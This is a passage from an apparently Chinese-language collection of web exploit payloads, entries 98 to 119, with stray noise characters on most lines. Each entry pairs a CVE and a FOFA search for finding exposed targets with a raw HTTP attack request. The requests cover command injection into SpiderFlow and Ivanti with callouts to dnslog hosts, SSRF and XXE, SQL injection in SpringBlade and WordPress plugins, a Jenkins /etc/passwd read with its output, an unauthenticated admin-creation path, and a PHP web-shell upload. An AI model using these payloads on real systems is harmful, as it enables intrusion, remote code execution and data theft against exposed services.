8 A  c  `3 p* tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( }: S* d* @5 v6 n7 I+ U
Accept-Encoding: gzip( a# M# M8 L4 p% y
Connection: close
6 J# W1 s7 P8 E/ k  iCookie: rememberMe=PAYLOAD; h, M# a' L* T  I8 c, b
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"4 Y. G( h2 e) L

/ A( N/ p+ l( d1 T% ?2 f6 A$ x' s+ E- s) T* Q, h2 O) b
98. SpiderFlow爬虫平台远程命令执行
+ w1 o" O' _& lCVE-2024-0195
% Z. M  G: Q5 `" |$ O" ^3 k) mFOFA:app="SpiderFlow"
7 e, u8 }4 s; s" B5 T& LPOST /function/save HTTP/1.1
5 x  s$ ]& N+ L' ?8 N; `Host: 192.168.40.130:8088
9 k$ [7 F+ Q; `/ P& rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ a& ?% ~+ W0 f$ U
Connection: close
- U" S# _3 s9 w2 m$ |1 ]Content-Length: 121
' F& Y0 ^* h7 v" r$ {5 Y2 pAccept: */*
; }% F3 i( N. W" rAccept-Encoding: gzip, deflate
8 a$ K7 y5 h4 U! g9 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 S2 R3 x$ E/ o. JContent-Type: application/x-www-form-urlencoded; charset=UTF-83 p6 C3 S9 Q$ `4 ?
X-Requested-With: XMLHttpRequest
* U0 r; Q9 c. s+ q- J  ~. c3 q- x. ?: q
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B# V9 U4 B1 H6 Y! z: f/ ~, t
" m" N- O# s! W: A( A& Q

4 s1 i7 h0 B" D( F- `6 B: w0 e* |99. Ncast盈可视高清智能录播系统busiFacade RCE! a' r0 \. a+ e
CVE-2024-0305
7 ], i1 T4 `& RFOFA:app="Ncast-产品" && title=="高清智能录播系统": x8 v6 }! j9 I+ E2 d/ V
POST /classes/common/busiFacade.php HTTP/1.1
: E& \6 [+ p' \" a. BHost: 192.168.40.130:8080
! `# H1 {+ [! d0 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0+ V: m/ W! a! I2 T3 G: G
Connection: close  _* e$ Y/ Z: I8 E
Content-Length: 154
) d8 z6 x3 q/ |* iAccept: */*% I; T# R" P3 L: j/ G: U
Accept-Encoding: gzip, deflate8 v- M/ ^. W, Q1 N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 c0 B5 O2 N* Q0 A, U4 ZContent-Type: application/x-www-form-urlencoded; charset=UTF-8
# @  t1 X( x8 n- EX-Requested-With: XMLHttpRequest
: E7 b  F/ f. ]3 X0 U! P
: e6 h7 i/ _, `8 w%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D3 [- |$ T' h* j) k" @

. }. f( H. t2 \7 P& y4 a7 U/ w6 k3 R+ \0 h% r6 a$ E
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传$ b4 \1 ]- _& P; q! r' B) K  U
CVE-2024-0352
& j: r  t  k% U' S- `% lFOFA:icon_hash="874152924"
' R+ |% }; w; m, f9 F  D7 `7 EPOST /api/file/formimage HTTP/1.1
! h1 b- m, S" h; u; q% s, C" rHost: 192.168.40.130; l8 d3 I% g* ?6 j5 N( D' |$ z5 B
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+ ]* a5 h# u- X, q6 N! _Connection: close0 Z. X$ A* o. f5 \
Content-Length: 201
0 Q# Z$ G: H  G( fContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei9 M- a' T! _  _! I9 ?. f6 G3 Y1 k
Accept-Encoding: gzip
+ U* t; V. Z) G% q+ b7 k! |0 f) Z$ j1 U
1 k1 Q3 e" n6 s6 i5 o+ L' x------WebKitFormBoundarygcflwtei
' d/ P% M4 ^3 \Content-Disposition: form-data; name="file";filename="IE4MGP.php"
2 ~- t9 G3 r: q7 PContent-Type: application/x-php
8 ?: B7 v; K% s2 d' W/ Z0 ?3 v) Q2 E0 f9 N9 ^. \
2ayyhRXiAsKXL8olvF5s4qqyI2O
( s1 S  P/ L) e/ g------WebKitFormBoundarygcflwtei--
# n& I, d$ ~0 R0 s/ N+ u1 R. e* B+ r( B( ^: G6 w
  J+ _6 U% U; O% V8 B
101. ivanti policy secure-22.6命令注入
( {" G4 t5 v* yCVE-2024-21887# ?9 Q% i3 ?" H5 L5 O8 F
FOFA:body="welcome.cgi?p=logo"( X3 O8 D; A, ]: J) M# J) c9 ?
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
- D/ s8 Y8 x: N  j- O6 ?Host: x.x.x.xx.x.x.x; U: I9 b  Y' |* ~3 I( Y. N# l
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- `5 m% o3 }/ d% z2 u/ b% r7 S2 cConnection: close
' Z- _5 [- C9 D8 HAccept-Encoding: gzip+ w! E) w! m7 p0 K9 }& T; E: y1 |
% G; F. i* \3 t- ^+ }* {( N8 y

7 [! }, r# D% V  Z# {102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行  L& Y) r+ x0 S7 M; D
CVE-2024-21893' u2 j! n5 D" b) D  L2 }+ j
FOFA:body="welcome.cgi?p=logo"
- J# g# _8 k9 \+ Q$ v3 GPOST /dana-ws/saml20.ws HTTP/1.1
# }1 H# }) Q7 t* C* F6 c/ `0 qHost: x.x.x.x
9 k( t2 T* |$ T0 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; ~/ m8 R; g  r6 a8 bConnection: close, x4 N6 b" G) ^, y9 }
Content-Length: 792
4 f4 {- P9 i; r* jAccept-Encoding: gzip
5 H* U2 f5 O8 ?8 v; z
1 P& `! a  p2 T$ G1 C( L/ m<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>
! q( I1 {" I% l5 }  q" w) Z, f. B/ v9 H4 N
103. Ivanti Pulse Connect Secure VPN XXE
# q' V, d' ^- [5 xCVE-2024-22024
- R6 m7 [7 @8 K: mFOFA:body="welcome.cgi?p=logo"2 D) i& T! d* p5 h" `/ {) {) o
POST /dana-na/auth/saml-sso.cgi HTTP/1.1# q7 r  `5 e- O" D
Host: 192.168.40.130:111
+ @& r5 P0 R2 {6 I% {User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36) r: |' C! L" x8 ^, C
Connection: close
# R1 w5 u5 ^, C1 l- XContent-Length: 204& v+ C. h# [3 Y$ L3 i
Content-Type: application/x-www-form-urlencoded1 @$ z5 X  Q# H3 \8 ^3 y* ]; t
Accept-Encoding: gzip
' `- u' ]/ w! _  `8 {) m6 S
& y) ~2 P" Z5 S4 _  Y+ U$ s, JSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==3 t' Q: _. G& L4 f( r5 j) s

4 r3 F* s3 \4 t- R8 a/ \. f& s+ r$ }/ y3 e* n" ]* ?" C, v
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
( ?% w+ {& }0 A<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
  D4 |8 E4 K( |& {7 Y  c$ ?+ _! A( h5 N1 m9 ~% \

+ m  v1 k4 j. Z" f104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露8 j9 E  v& R# x/ J
CVE-2024-0569
+ Z! I) z. z* ^FOFA:title="TOTOLINK"
: K: ]7 V/ s( t# Z! T6 ~) lPOST /cgi-bin/cstecgi.cgi HTTP/1.1( x5 Z9 j- n) D& @: [
Host:192.168.0.1
, B8 s; g9 `2 u& ]Content-Length:41
' q2 F% R% w' G* e. KAccept:application/json,text/javascript,*/*;q=0.01
9 V! ~! L; L) v9 D# ^3 H, r- o; L1 rX-Requested-with: XMLHttpRequest
5 ~: U) l9 K+ ]; Z1 [1 v" ~User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
1 ?/ P& h! ]) D* K, A3 I/ q0 WContent-Type: application/x-www-form-urlencoded:charset=UTF-8
/ v, }: e  T5 {6 G5 Q- gOrigin: http://192.168.0.1
5 h# b& A* e2 G3 c/ zReferer: http://192.168.0.1/advance/index.html?time=1671152380564- e& t. v% Q: _8 o$ f& m' ]
Accept-Encoding:gzip,deflate
  H6 A9 D) U! f) J5 C; BAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
& ^% c# u& C6 d" pConnection:close
; L  I& [; S6 Q" `9 r) J( {* \' W1 K, j; F$ r
{
  n8 q2 M+ X2 [  Y. Y) O& `# h"topicurl":"getSysStatusCfg",
5 b6 g7 K: S! I( ]1 J9 W$ |7 h"token":""4 N2 E- m' ?7 l3 n$ U/ S
}" Q8 n/ w$ {( ?- r

3 j# s. m" G# H$ A1 z% _6 h105. SpringBlade v3.2.0 export-user SQL 注入
. y& q$ t) U6 Y0 _FOFA:body="https://bladex.vip"
" h- `9 i6 V/ P  Y$ V4 T/ S5 Z) Khttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
; |6 {( R( c3 g  v4 f7 L4 e7 X0 F
( q' [: M/ m6 B3 a8 t106. SpringBlade dict-biz/list SQL 注入  o8 Q+ l& N4 I5 A
FOFA:body="Saber 将不能正常工作"& n+ [; l9 r; I  N% u; ~2 L5 l
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
7 j6 U; y! k9 U# \" v+ lHost: your-ip" W. o+ A( t4 f5 C0 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& b5 P2 v7 l4 ?( O
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A9 g- U7 Q* E3 o$ L  U& B, I
Accept-Encoding: gzip, deflate
1 t5 q) ^: }- @* h4 GAccept-Language: zh-CN,zh;q=0.9
" ~$ Q: U( u. d4 W1 EConnection: close
# U, r: Y' i0 S- `- z
/ g5 k% }3 B7 h! X( P- G5 @
; O' }. R# B: a, j107. SpringBlade tenant/list SQL 注入
- ^' \6 G+ d9 v: wFOFA:body="https://bladex.vip"
# h2 k/ N( e) j" n( OGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.10 g. f- T; A0 G! d1 ?' E2 V- [9 T
Host: your-ip
- B; m* \+ h- [* i1 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& U) v& S& ]  Y$ I
Blade-Auth:替换为自己的
0 J; k2 {* |" {$ MConnection: close, u7 i3 P2 H9 K- u: P; k* s. \
' g$ w+ R5 G' w3 l4 t9 A

+ x9 z8 X0 v, m/ x4 v* |2 B. r% H108. D-Tale 3.9.0 SSRF2 y6 V- `# N3 m4 F
CVE-2024-21642
8 v% Z6 ~3 Z+ y  V' `: SFOFA:"dtale/static/images/favicon.png"
# C. c2 L6 {* ^9 D* cGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
1 c% W4 n7 g- w3 x) S: S2 \Host: your-ip
+ u4 z" G8 v+ N& wAccept: application/json, text/plain, */*
$ y2 M. _% t9 x. `! YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36/ A  ]  p% ^0 {) Q/ P6 Y8 j
Accept-Encoding: gzip, deflate
( i) S, q8 @2 L. V2 x& bAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
6 y* F/ L6 l+ w6 _+ ZConnection: close
/ Z1 ~) K; C- V8 l# E* o
) l* A1 w. L6 r, G8 H" v. N1 m* V) f
' J, g) M% @) R" P109. Jenkins CLI 任意文件读取
$ y, f3 b0 [3 n5 U; ICVE-2024-238971 ^: p' U* h8 F+ m: U
FOFA:header="X-Jenkins"' o, E( {4 g7 Q: j  f+ d
POST /cli?remoting=false HTTP/1.1$ Z, y1 h' t; W! r: t6 n; b
Host:7 Y+ K+ C& I' x$ m4 N
Content-type: application/octet-stream& W& o, G1 D' E, b
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e924 E. A5 t/ n! ?+ ~
Side: upload
& d( B5 Y2 p7 H+ ?3 {Connection: keep-alive
5 S$ \3 k: g7 t! S" F6 rContent-Length: 163) X6 s, X2 r; X) Z# k8 h  I5 e0 X

" H  k- A* }$ T) tb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'7 F( ]7 K5 Y# i8 \0 D1 }0 G8 u( J! W9 i# v

: D6 L7 u7 @5 G! J9 J5 J( d
( x' t3 R; m6 l7 z" O& vPOST /cli?remoting=false HTTP/1.1
$ e" l4 E3 _0 RHost:
4 m# v, [, [+ Y2 e$ xSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
# ]. d6 w+ ]' fdownload
8 V# q+ o' K( k5 y# g2 PContent-Type: application/x-www-form-urlencoded
/ {/ Z5 r  p3 O" w: d2 ~( WContent-Length: 0
2 u4 h, w  M' C6 M+ D
% B" Q; D' t* |) H" i7 t  d& h$ Q! `1 X7 R
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
2 l* A6 G& y& f- P. a5 p: `4 Vjava -jar jenkins-cli.jar help9 U: `) @4 \. Y% X7 E
[COMMAND]/ L# c+ k$ c" a# B! N, s) J5 l; A
Lists all the available commands or a detailed description of single command.
; X; B* g5 s; z6 u7 h COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)/ k7 u# ~* |! `% Z8 d, Y! H
8 K% k$ B' P; v* _8 @0 }
, _( l; ]  h0 s/ |  V
110. Goanywhere MFT 未授权创建管理员1 v6 B( A% G! l8 w2 T+ E
CVE-2024-0204
0 ]6 d9 ~" C) Z. NFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"3 l; J* w- P+ ]1 t
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1$ K- {/ t: j" g
Host: 192.168.40.130:80009 _4 T' l6 x" Q
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
# Q4 u4 P/ i7 c- b' O0 MConnection: close
$ k1 q+ S6 u; V. z6 D3 b5 hAccept: */*
+ F" Z- z* C- RAccept-Language: en6 C$ q3 O3 j  e4 L" F6 M4 J* S
Accept-Encoding: gzip
: H% {4 t6 ?, z. N- Q9 t- _0 S/ D" I1 E. T; P- _9 r
. J+ f- \- l5 ]8 T. p; T
111. WordPress Plugin HTML5 Video Player SQL注入
# w4 G* F7 B' {CVE-2024-1061
9 @( N6 [& W) z( h; l3 _5 PFOFA:"wordpress" && body="html5-video-player"
4 x* I1 X1 i% x8 |+ ]GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
2 H" L$ o" q7 r* m, tHost: 192.168.40.130:112" S# |, c6 M+ R
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.367 c$ o, L) l7 H5 V
Connection: close
& W. r8 v& ^" Y/ U0 {- I0 B* wAccept: */*' ?8 n1 A8 b% T3 ^, L: g
Accept-Language: en
& X4 u0 M+ ^! m6 E2 kAccept-Encoding: gzip  I* \) m" u! P0 c$ z) {2 z& O
9 D) [/ O$ W- @% M1 N
* d; M3 H* k( N* i$ k; Q( D7 k
112. WordPress Plugin NotificationX SQL 注入$ m  a0 ^0 [  {
CVE-2024-1698- N5 P/ r! y% }' n
FOFA:body="/wp-content/plugins/notificationx"
+ d& k4 c2 @/ H2 S% n+ APOST /wp-json/notificationx/v1/analytics HTTP/1.1# E9 A  U7 a% d' W1 g) u
Host: {{Hostname}}
# b4 M6 _$ h7 R+ a) ZContent-Type: application/json
! o& o4 J8 P* C0 M# N, @& |! T! W$ e  F9 S
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}* k1 k: u1 J  l0 X* D! L
1 k! F  H' C8 s% B0 r9 z, J0 ?

2 i9 G0 Z' h' E- V" G113. WordPress Automatic 插件任意文件下载和SSRF: P" K( e* k% {
CVE-2024-27954
8 r" _: |6 x; B: [+ O. r5 NFOFA:"/wp-content/plugins/wp-automatic"3 J' L" \7 `" ^% R3 v
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.10 X' i9 P* M3 I3 C
Host: x.x.x.x/ a6 Z8 X7 \' b* {3 o9 {5 G7 H
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
2 S. I2 ]7 v" Y5 cConnection: close
, r* i1 w( [, t. Z- UAccept: */*
  O  Q( Y* r' p8 LAccept-Language: en
5 h7 L2 o/ V! h2 k- u3 xAccept-Encoding: gzip- _% g: P0 e  }, C8 [- `- i
7 {3 {; _& T: b1 U' c/ s1 c
3 D  h0 a. l9 x- o! a& _
114. WordPress MasterStudy LMS插件 SQL注入9 ~+ c7 g- B/ v! M
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
' U+ T' n( I/ D* cGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
0 b4 K. Z8 S/ q2 g' a% O. E) OHost: your-ip
  h/ v$ K* V/ J( iUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36* ?/ p% N, v& _7 {0 K) a
Accept-Charset: utf-80 y9 s5 ~. }0 V  `2 C4 }- y+ U
Accept-Encoding: gzip, deflate8 k( e, P8 _' ~6 [1 S; ~$ M$ ^
Connection: close" K) a% w9 O6 k4 {/ R1 f9 T% `3 Y

* z' d2 [7 Q( ^$ D7 D- H
9 X, U' j# h6 d+ }/ L, B. T$ u: W115. WordPress Bricks Builder <= 1.9.6 RCE
# c1 U: E5 }2 o; ACVE-2024-256006 b5 J. j3 z; k
FOFA: body="/wp-content/themes/bricks/"
. z2 B+ A- o2 m+ H5 s2 n, I& \第一步,获取网站的nonce值( ~  F. s; @% Y% V
GET / HTTP/1.1
+ A1 P) R* j6 n: H, t# U- dHost: x.x.x.x
  R  V7 W  r' \5 m0 _, aUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
- |2 B( c* U3 kConnection: close
1 L& K9 a$ ?3 u8 g: y; `' E; RAccept-Encoding: gzip
1 }9 \0 E  _6 f2 }' ^0 y* S2 z/ k+ Z* j; ^" ~' B

2 a1 X- ]- ^6 A& z/ e# A第二步替换nonce值,执行命令/ E1 q7 k$ s: {) k* N
POST /wp-json/bricks/v1/render_element HTTP/1.13 K: ?1 K4 @, k! O: T7 E$ S
Host: x.x.x.x
4 |6 W1 I% C7 r0 Z. l3 ]5 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
' {1 M' z6 y4 o  @( w  hConnection: close) c2 G+ K3 i6 p; e- p; o
Content-Length: 356( u, c# t( M& H  v
Content-Type: application/json
) N7 g0 _1 \/ t$ H* M# n- LAccept-Encoding: gzip
' E& x: h& T6 g8 \* S* Q  T" s' g: g9 y  b  [- S" c
{
/ ]. F: E, D5 Q" M"postId": "1",
4 Z( P* F. F9 p6 S  "nonce": "第一步获得的值",
5 _; g# D: F2 e" H2 E* l  ~5 l' a  "element": {
) k% v2 b* o7 F" J; t5 ?! }    "name": "container",. E  T5 c6 e/ K0 t
    "settings": {, v* `: j3 K- Y( K) f3 m( o
      "hasLoop": "true",, W7 x1 ^( _3 l+ E
      "query": {) Z$ M  D5 a8 q
        "useQueryEditor": true,
4 ^8 e2 E0 ?  J' k3 h: \        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
& G8 ?  A# @9 A4 J0 }7 g        "objectType": "post"8 X% v+ Z3 a0 v! V! ]5 j
      }
5 T/ {0 a6 ?$ X% w2 L+ g    }
  w* d* q8 v% S5 S  m  }/ e7 }6 f! y4 y1 Z% @7 m
}
: A* l% }: }0 l) S" F7 K( S' ~5 ^; u) a

; T, W, |- h  B116. wordpress js-support-ticket文件上传
' D0 V- m; F$ u8 {0 hFOFA:body="wp-content/plugins/js-support-ticket"
" F$ ?+ Q4 C: r, H7 F% FPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.15 E# j) A) a. H
Host:& ]7 u2 q# J8 X
Content-Type: multipart/form-data; boundary=--------767099171
. p5 a. b% B0 ]! }8 NUser-Agent: Mozilla/5.0
9 g3 Q7 T2 p3 c! i5 D
0 g  t2 L' q3 o2 I----------767099171! X: g4 ]8 b7 Z2 r4 ~' z
Content-Disposition: form-data; name="action"
; b8 }* _; e" c, X8 nconfiguration_saveconfiguration' e/ o' S. ?( d1 a0 D
----------7670991710 ?' Q* {$ ~, r
Content-Disposition: form-data; name="form_request"
; Q4 g( a2 W7 l5 f# Ljssupportticket
0 Q* n: C5 V! ?5 s9 n& V7 m----------767099171( W& m1 W( S6 o' j8 _, Q& @0 R
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"2 ~' x8 Z% _0 H1 s! I
Content-Type: image/png
) P- ]5 y7 L3 W" O( P" ?- W----------767099171--
: B$ c: |* Y: n& s  K: a" R) x
7 a& e9 O' f: V' i+ D  F! {$ L0 {4 r4 y$ j
117. WordPress LayerSlider插件SQL注入. a  A. Z5 w- o
version:7.9.11 – 7.10.0& F9 L" R4 [' T5 n9 a: D
FOFA:body="/wp-content/plugins/LayerSlider/"0 g  ?1 h6 {+ ]9 A  z
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.10 m7 R7 z3 o3 ^( F2 z. t) J% y. [
Host: your-ip9 Y# p/ t. n2 e& ^. [2 D9 Z  S" E! A% `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
) [* j! u' I9 [# q4 p. N( o# P4 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 ~) L3 F) x2 Q" j9 ^7 n, Y! CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 g/ \  a0 R6 H! U, T' U  vAccept-Encoding: gzip, deflate, br9 i# E9 U% }7 v/ n. y5 W" _3 I
Connection: close
: W% @/ Q$ {! CUpgrade-Insecure-Requests: 1  i* N- X2 s, i% o( B& \+ J4 W
7 Q& y+ l! D3 n/ J2 {' h9 I! f" ^

& S) c- Y# N4 f7 d( |' Q' a118. 北京百绰智能S210管理平台uploadfile.php任意文件上传6 q0 g' s6 r: Z# ~8 O; [
CVE-2024-0939# G# z3 M7 X+ a# n/ C& a# G
FOFA:title="Smart管理平台"7 p1 d$ A* x1 c5 S; Q4 }. w) `
POST /Tool/uploadfile.php? HTTP/1.19 T( s* L& `, N2 K) e# W( C
Host: 192.168.40.130:8443
% b" r" o: g0 FCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
+ p$ V4 V8 y3 b; k2 G9 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.03 F6 u: \9 Z5 T& r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 C3 [  a$ q8 D2 G: G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 q. y2 D2 _; k8 @" l
Accept-Encoding: gzip, deflate/ I+ M9 S! y; @- V+ C
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
' V* ~5 W" ^; H7 x% [; bContent-Length: 405
8 x. T+ }" L6 B& fOrigin: https://192.168.40.130:8443
7 K5 j, ]# p2 p, V9 gReferer: https://192.168.40.130:8443/Tool/uploadfile.php
" d+ f* \$ R. M& O6 Y  ^Upgrade-Insecure-Requests: 1
4 a$ f7 z; E3 d7 H2 J9 vSec-Fetch-Dest: document& i" |7 R. D' W6 n; e, c+ Z" p& Q
Sec-Fetch-Mode: navigate
3 Z: ~  w1 m3 `. B  i# Z1 USec-Fetch-Site: same-origin, {* q( }8 [. \
Sec-Fetch-User: ?1
( n) s" e: s" ^4 y5 STe: trailers
% \" W. e4 M8 IConnection: close
5 @8 w- ~9 \# D* G3 j* F: a( e& T$ ~6 Q" o
-----------------------------139797012227476466340371828872 g1 `) B9 F3 O' h
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
3 A4 x7 g8 H' `, DContent-Type: application/octet-stream7 b) c' r. S# ]! v

! p8 J# I! _, Y<?php7 V6 e7 C7 h3 r! {( u% K
system($_POST["passwd"]);
$ l1 R# {# f' h?>/ U) T- g7 P/ j
-----------------------------139797012227476466340371828874 ?$ Y7 B7 J$ r& ?4 R
Content-Disposition: form-data; name="txt_path"% H" {; _3 F0 N2 a
9 ^( f0 _0 H% j% o% h; z) f
/home/src.php
& s. p8 E. W. S: Q9 Q-----------------------------13979701222747646634037182887--
! k% J6 j7 ?" c9 B* q2 S( q
$ {' N7 Z, k) L: E8 f
6 [6 S( [+ c& D' |' V0 x访问/home/src.php
. W$ ~. ~9 i+ E+ r3 g8 U+ t" r  W6 y6 s1 V' T& b5 z
119. 北京百绰智能S20后台sysmanageajax.php sql注入/ F1 I$ F1 F% H- D
CVE-2024-1254
2 l$ F% o+ \' P9 ^; xFOFA:title="Smart管理平台"* ?4 Q- x- x& F- K
先登录进入系统,默认账号密码为admin/admin
' B, v3 g0 D  y6 u# gPOST /sysmanage/sysmanageajax.php HTTP/1.11
